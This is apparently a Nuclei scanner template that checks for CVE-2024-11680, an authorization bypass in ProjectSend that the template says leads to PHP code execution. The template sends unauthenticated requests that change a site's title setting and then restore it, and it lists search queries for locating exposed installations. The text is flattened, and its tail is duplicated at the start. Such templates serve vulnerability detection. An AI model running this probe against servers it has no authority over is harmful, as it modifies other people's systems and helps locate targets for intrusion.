Log in » ([0-9a-zA-Z]+)<\/title>' internal: true - raw: - | POST /options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf_token={{csrf}}§ion=general&this_install_title={{string}} matchers: - type: dsl dsl: - 'status_code == 500' - 'contains(content_type, "text/html")' condition: and internal: true - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "{{string}}")' condition: and internal: true - raw: - | POST /options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf_token={{csrf}}§ion=general&this_install_title={{title}} matchers: - type: dsl dsl: - 'status_code == 500' - 'contains(content_type, "text/html")' condition: and internal: true - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "{{title}}")' condition: and # digest: 490a00463044022069e33d6bf9c7e823ca82d568cf32ce5078da4ebe9869fab89ec5b16ff6ff1c1e02207dcab84f6280bfaabe123a066786187df522eecfe7ad7d2796d8955eb8b30fa4:922c64590222798bb761d5b6d8e72950

id: CVE-2024-11680 info: name: ProjectSend <= r1605 - Improper Authorization author: DhiyaneshDK severity: critical description: | An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application. reference: - https://www.projectsend.org/ - https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf - https://vulncheck.com/advisories/projectsend-bypass classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-11680 cwe-id: CWE-287,CWE-863 epss-score: 0.46821 epss-percentile: 0.97618 cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: projectsend product: projectsend shodan-query: - http.html:"projectsend" - http.html:"projectsend setup" - http.html:"provided by projectsend" fofa-query: - body="projectsend" - body="projectsend setup" - body=provided by projectsend google-query: intext:provided by projectsend tags: cve,cve2024,projectsend,auth-bypass,intrusive,kev variables: string: "{{randstr}}" flow: http(1) && http(2) && http(3) && http(4) && http(5) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "projectsend")' condition: and internal: true extractors: - type: regex name: csrf group: 1 regex: - 'name="csrf_token" value="([0-9a-z]+)"' internal: true - type: regex name: title group: 1 regex: - 'Log in » ([0-9a-zA-Z]+)<\/title>' internal: true - raw: - | POST /options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf_token={{csrf}}§ion=general&this_install_title={{string}} matchers: - type: dsl dsl: - 'status_code == 500' - 'contains(content_type, "text/html")' condition: and internal: true - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "{{string}}")' condition: and internal: true - raw: - | POST /options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf_token={{csrf}}§ion=general&this_install_title={{title}} matchers: - type: dsl dsl: - 'status_code == 500' - 'contains(content_type, "text/html")' condition: and internal: true - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "{{title}}")' condition: and # digest: 490a00463044022069e33d6bf9c7e823ca82d568cf32ce5078da4ebe9869fab89ec5b16ff6ff1c1e02207dcab84f6280bfaabe123a066786187df522eecfe7ad7d2796d8955eb8b30fa4:922c64590222798bb761d5b6d8e72950